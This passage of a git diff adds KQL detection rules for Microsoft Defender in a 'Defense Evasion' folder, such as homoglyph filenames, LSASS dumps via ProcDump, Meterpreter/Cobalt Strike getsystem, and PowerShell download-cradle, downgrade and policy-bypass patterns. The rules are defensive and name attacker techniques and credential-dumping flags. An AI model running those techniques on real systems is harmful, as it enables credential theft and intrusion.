ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql new file mode 100644 index 00000000..da8a62c3 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_homoglyph_attack_using_lookalike_characters_in_filename.kql @@ -0,0 +1,15 @@ +// Title: Potential Homoglyph Attack Using Lookalike Characters in Filename +// Author: Micah Babinski, @micahbabinski +// Date: 2023-05-08 +// Level: medium +// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. +This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that +are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003 +// False Positives: +// - File names with legitimate Cyrillic text. Will likely require tuning (or not be usable) in countries where these alphabets are in use. + +DeviceFileEvents +| where (FolderPath contains "а" or FolderPath contains "е" or FolderPath contains "о" or FolderPath contains "р" or FolderPath contains "с" or FolderPath contains "х" or FolderPath contains "ѕ" or FolderPath contains "і" or FolderPath contains "ӏ" or FolderPath contains "ј" or FolderPath contains "һ" or FolderPath contains "ԁ" or FolderPath contains "ԛ" or FolderPath contains "ԝ" or FolderPath contains "ο") or (FolderPath contains "А" or FolderPath contains "В" or FolderPath contains "Е" or FolderPath contains "К" or FolderPath contains "М" or FolderPath contains "Н" or FolderPath contains "О" or FolderPath contains "Р" or FolderPath contains "С" or FolderPath contains "Т" or FolderPath contains "Х" or FolderPath contains "Ѕ" or FolderPath contains "І" or FolderPath contains "Ј" or FolderPath contains "Ү" or FolderPath contains "Ӏ" or FolderPath contains "Ԍ" or FolderPath contains "Ԛ" or FolderPath contains "Ԝ" or FolderPath contains "Α" or FolderPath contains "Β" or FolderPath contains "Ε" or FolderPath contains "Ζ" or FolderPath contains "Η" or FolderPath contains "Ι" or FolderPath contains "Κ" or FolderPath contains "Μ" or FolderPath contains "Ν" or FolderPath contains "Ο" or FolderPath contains "Ρ" or FolderPath contains "Τ" or FolderPath contains "Υ" or FolderPath contains "Χ") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql new file mode 100644 index 00000000..9b94e252 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_lethalhta_technique_execution.kql @@ -0,0 +1,10 @@ +// Title: Potential LethalHTA Technique Execution +// Author: Markus Neis +// Date: 2018-06-07 +// Level: high +// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.005 + +DeviceProcessEvents +| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql new file mode 100644 index 00000000..33f0631e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_libvlc_dll_sideloading.kql @@ -0,0 +1,12 @@ +// Title: Potential Libvlc.DLL Sideloading +// Author: X__Junior +// Date: 2023-04-17 +// Level: medium +// Description: Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - False positives are expected if VLC is installed in non-default locations + +DeviceImageLoadEvents +| where FolderPath endswith "\\libvlc.dll" and (not((FolderPath startswith "C:\\Program Files (x86)\\VideoLAN\\VLC\\" or FolderPath startswith "C:\\Program Files\\VideoLAN\\VLC\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql new file mode 100644 index 00000000..b393fef2 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_lsass_process_dump_via_procdump.kql @@ -0,0 +1,17 @@ +// Title: Potential LSASS Process Dump Via Procdump +// Author: Florian Roth (Nextron Systems) +// Date: 2018-10-30 +// Level: high +// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump. +This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers. +LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory. +Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009 +// False Positives: +// - Unlikely, because no one should dump an lsass process memory +// - Another tool that uses command line flags similar to ProcDump + +DeviceProcessEvents +| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql new file mode 100644 index 00000000..4cdaeef5 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_manage_bde_wsf_abuse_to_proxy_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Manage-bde.wsf Abuse To Proxy Execution +// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-13 +// Level: high +// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql new file mode 100644 index 00000000..b71d8e71 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_memory_dumping_activity_via_livekd.kql @@ -0,0 +1,12 @@ +// Title: Potential Memory Dumping Activity Via LiveKD +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-15 +// Level: medium +// Description: Detects execution of LiveKD based on PE metadata or image name +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Administration and debugging activity (must be investigated) + +DeviceProcessEvents +| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql new file mode 100644 index 00000000..178c730c --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_meterpreter_cobaltstrike_activity.kql @@ -0,0 +1,13 @@ +// Title: Potential Meterpreter/CobaltStrike Activity +// Author: Teymur Kheirkhabarov, Ecco, Florian Roth +// Date: 2019-10-26 +// Level: high +// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002 +// False Positives: +// - Commandlines containing components like cmd accidentally +// - Jobs and services started with cmd + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql new file mode 100644 index 00000000..a7f8629d --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_mftrace_exe_abuse.kql @@ -0,0 +1,12 @@ +// Title: Potential Mftrace.EXE Abuse +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: medium +// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use for tracing purposes + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\mftrace.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql new file mode 100644 index 00000000..97112aef --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_msiexec_masquerading.kql @@ -0,0 +1,10 @@ +// Title: Potential MsiExec Masquerading +// Author: Florian Roth (Nextron Systems) +// Date: 2019-11-14 +// Level: high +// Description: Detects the execution of msiexec.exe from an uncommon directory +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 + +DeviceProcessEvents +| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql new file mode 100644 index 00000000..07571635 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_ntlm_coercion_via_certutil_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential NTLM Coercion Via Certutil.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql new file mode 100644 index 00000000..5029f77d --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_obfuscated_ordinal_call_via_rundll32.kql @@ -0,0 +1,10 @@ +// Title: Potential Obfuscated Ordinal Call Via Rundll32 +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-05-17 +// Level: medium +// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.010 + +DeviceProcessEvents +| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql new file mode 100644 index 00000000..2f8dca1e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_password_spraying_attempt_using_dsacls_exe.kql @@ -0,0 +1,12 @@ +// Title: Potential Password Spraying Attempt Using Dsacls.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects possible password spraying attempts using Dsacls +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate use of dsacls to bind to an LDAP session + +DeviceProcessEvents +| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql new file mode 100644 index 00000000..ae538fc8 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_pendingfilerenameoperations_tampering.kql @@ -0,0 +1,13 @@ +// Title: Potential PendingFileRenameOperations Tampering +// Author: frack113 +// Date: 2023-01-27 +// Level: medium +// Description: Detect changes to the "PendingFileRenameOperations" registry key from uncommon or suspicious images locations to stage currently used files for rename or deletion after reboot. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.003 +// False Positives: +// - Installers and updaters may set currently in use files for rename or deletion after a reboot. + +DeviceRegistryEvents +| where RegistryKey contains "\\CurrentControlSet\\Control\\Session Manager\\PendingFileRenameOperations" and ((InitiatingProcessFolderPath endswith "\\reg.exe" or InitiatingProcessFolderPath endswith "\\regedit.exe") or InitiatingProcessFolderPath contains "\\Users\\Public\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql new file mode 100644 index 00000000..62321492 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_home_page.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Outlook Home Page +// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand +// Date: 2021-06-09 +// Level: high +// Description: Detects potential persistence activity via outlook home page. +An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\WebView*") and RegistryKey endswith "\\URL" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql new file mode 100644 index 00000000..c1c59c55 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_persistence_via_outlook_today_page.kql @@ -0,0 +1,12 @@ +// Title: Potential Persistence Via Outlook Today Page +// Author: Tobias Michalski (Nextron Systems), David Bertho (@dbertho) & Eirik Sveen (@0xSV1), Storebrand +// Date: 2021-06-10 +// Level: high +// Description: Detects potential persistence activity via outlook today page. +An attacker can set a custom page to execute arbitrary code and link to it via the registry values "URL" and "UserDefinedUrl". + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.t1112 + +DeviceRegistryEvents +| where (RegistryKey endswith "Software\\Microsoft\\Office*" and RegistryKey endswith "\\Outlook\\Today*") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Stamp") or (RegistryKey endswith "\\URL" or RegistryKey endswith "\\UserDefinedUrl")) and (not((InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql new file mode 100644 index 00000000..1dc9fe8b --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_powershell_downgrade_attack.kql @@ -0,0 +1,10 @@ +// Title: Potential PowerShell Downgrade Attack +// Author: Harish Segar (rule) +// Date: 2020-03-20 +// Level: medium +// Description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -version 2 " or ProcessCommandLine contains " -versio 2 " or ProcessCommandLine contains " -versi 2 " or ProcessCommandLine contains " -vers 2 " or ProcessCommandLine contains " -ver 2 " or ProcessCommandLine contains " -ve 2 " or ProcessCommandLine contains " -v 2 ") and FolderPath endswith "\\powershell.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql new file mode 100644 index 00000000..eae9983e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering.kql @@ -0,0 +1,10 @@ +// Title: Potential PowerShell Execution Policy Tampering +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: medium +// Description: Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where ((RegistryValueData contains "Bypass" or RegistryValueData contains "Unrestricted") and (RegistryKey endswith "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy")) and (not((InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql new file mode 100644 index 00000000..d1456edc --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_policy_tampering_proccreation.kql @@ -0,0 +1,10 @@ +// Title: Potential PowerShell Execution Policy Tampering - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: high +// Description: Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\PowerShell\\ExecutionPolicy") and (ProcessCommandLine contains "Bypass" or ProcessCommandLine contains "RemoteSigned" or ProcessCommandLine contains "Unrestricted") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql new file mode 100644 index 00000000..acc10fec --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_powershell_execution_via_dll.kql @@ -0,0 +1,12 @@ +// Title: Potential PowerShell Execution Via DLL +// Author: Markus Neis, Nasreddine Bencherchali (Nextron Systems) +// Date: 2018-08-25 +// Level: high +// Description: Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll. +This detection assumes that PowerShell commands are passed via the CommandLine. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Default.GetString" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "FromBase64String" or ProcessCommandLine contains "ICM " or ProcessCommandLine contains "IEX " or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "Invoke-Expression") and ((FolderPath endswith "\\InstallUtil.exe" or FolderPath endswith "\\RegAsm.exe" or FolderPath endswith "\\RegSvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe") or (ProcessVersionInfoOriginalFileName in~ ("InstallUtil.exe", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.EXE", "RUNDLL32.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql new file mode 100644 index 00000000..acc55b06 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_powershell_obfuscation_via_reversed_commands.kql @@ -0,0 +1,12 @@ +// Title: Potential PowerShell Obfuscation Via Reversed Commands +// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton +// Date: 2020-10-11 +// Level: high +// Description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "hctac" or ProcessCommandLine contains "kaerb" or ProcessCommandLine contains "dnammoc" or ProcessCommandLine contains "ekovn" or ProcessCommandLine contains "eliFd" or ProcessCommandLine contains "rahc" or ProcessCommandLine contains "etirw" or ProcessCommandLine contains "golon" or ProcessCommandLine contains "tninon" or ProcessCommandLine contains "eddih" or ProcessCommandLine contains "tpircS" or ProcessCommandLine contains "ssecorp" or ProcessCommandLine contains "llehsrewop" or ProcessCommandLine contains "esnopser" or ProcessCommandLine contains "daolnwod" or ProcessCommandLine contains "tneilCbeW" or ProcessCommandLine contains "tneilc" or ProcessCommandLine contains "ptth" or ProcessCommandLine contains "elifotevas" or ProcessCommandLine contains "46esab" or ProcessCommandLine contains "htaPpmeTteG" or ProcessCommandLine contains "tcejbO" or ProcessCommandLine contains "maerts" or ProcessCommandLine contains "hcaerof" or ProcessCommandLine contains "retupmoc") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not((ProcessCommandLine contains " -EncodedCommand " or ProcessCommandLine contains " -enc "))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql new file mode 100644 index 00000000..e1323e69 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_privilege_escalation_attempt_via_exe_local_technique.kql @@ -0,0 +1,10 @@ +// Title: Potential Privilege Escalation Attempt Via .Exe.Local Technique +// Author: Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash) +// Date: 2022-12-16 +// Level: high +// Description: Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation + +DeviceFileEvents +| where FolderPath endswith "\\comctl32.dll" and (FolderPath startswith "C:\\Windows\\System32\\logonUI.exe.local" or FolderPath startswith "C:\\Windows\\System32\\werFault.exe.local" or FolderPath startswith "C:\\Windows\\System32\\consent.exe.local" or FolderPath startswith "C:\\Windows\\System32\\narrator.exe.local" or FolderPath startswith "C:\\Windows\\System32\\wermgr.exe.local") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql new file mode 100644 index 00000000..ae043a3c --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_process_execution_proxy_via_cl_invocation_ps1.kql @@ -0,0 +1,10 @@ +// Title: Potential Process Execution Proxy Via CL_Invocation.ps1 +// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova +// Date: 2020-10-14 +// Level: medium +// Description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "SyncInvoke " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql new file mode 100644 index 00000000..e6ed551a --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution.kql @@ -0,0 +1,10 @@ +// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-08-08 +// Level: high +// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where ProcessCommandLine contains "SOFTWARE\\Microsoft\\Provisioning\\Commands\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql new file mode 100644 index 00000000..97b0dabf --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_provisioning_registry_key_abuse_for_binary_proxy_execution_reg.kql @@ -0,0 +1,10 @@ +// Title: Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG +// Author: Swachchhanda Shrawan Poudel +// Date: 2023-08-02 +// Level: high +// Description: Detects potential abuse of the provisioning registry key for indirect command execution through "Provlaunch.exe". +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceRegistryEvents +| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Provisioning\\Commands*" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql new file mode 100644 index 00000000..9d71d4f4 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_provlaunch_exe_binary_proxy_execution_abuse.kql @@ -0,0 +1,10 @@ +// Title: Potential Provlaunch.EXE Binary Proxy Execution Abuse +// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel +// Date: 2023-08-08 +// Level: medium +// Description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\provlaunch.exe" and (not(((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\PerfLogs\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Users\\Public\\" or FolderPath contains "\\AppData\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql new file mode 100644 index 00000000..57c07bad --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_ransomware_or_unauthorized_mbr_tampering_via_bcdedit_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE +// Author: @neu5ron +// Date: 2019-02-07 +// Level: medium +// Description: Detects potential malicious and unauthorized usage of bcdedit.exe +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070, attack.persistence, attack.t1542.003 + +DeviceProcessEvents +| where (ProcessCommandLine contains "delete" or ProcessCommandLine contains "deletevalue" or ProcessCommandLine contains "import" or ProcessCommandLine contains "safeboot" or ProcessCommandLine contains "network") and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql new file mode 100644 index 00000000..6293493e --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_register_app_vbs_lolscript_abuse.kql @@ -0,0 +1,12 @@ +// Title: Potential Register_App.Vbs LOLScript Abuse +// Author: Austin Songer @austinsonger +// Date: 2021-11-05 +// Level: medium +// Description: Detects potential abuse of the "register_app.vbs" script that is part of the Windows SDK. The script offers the capability to register new 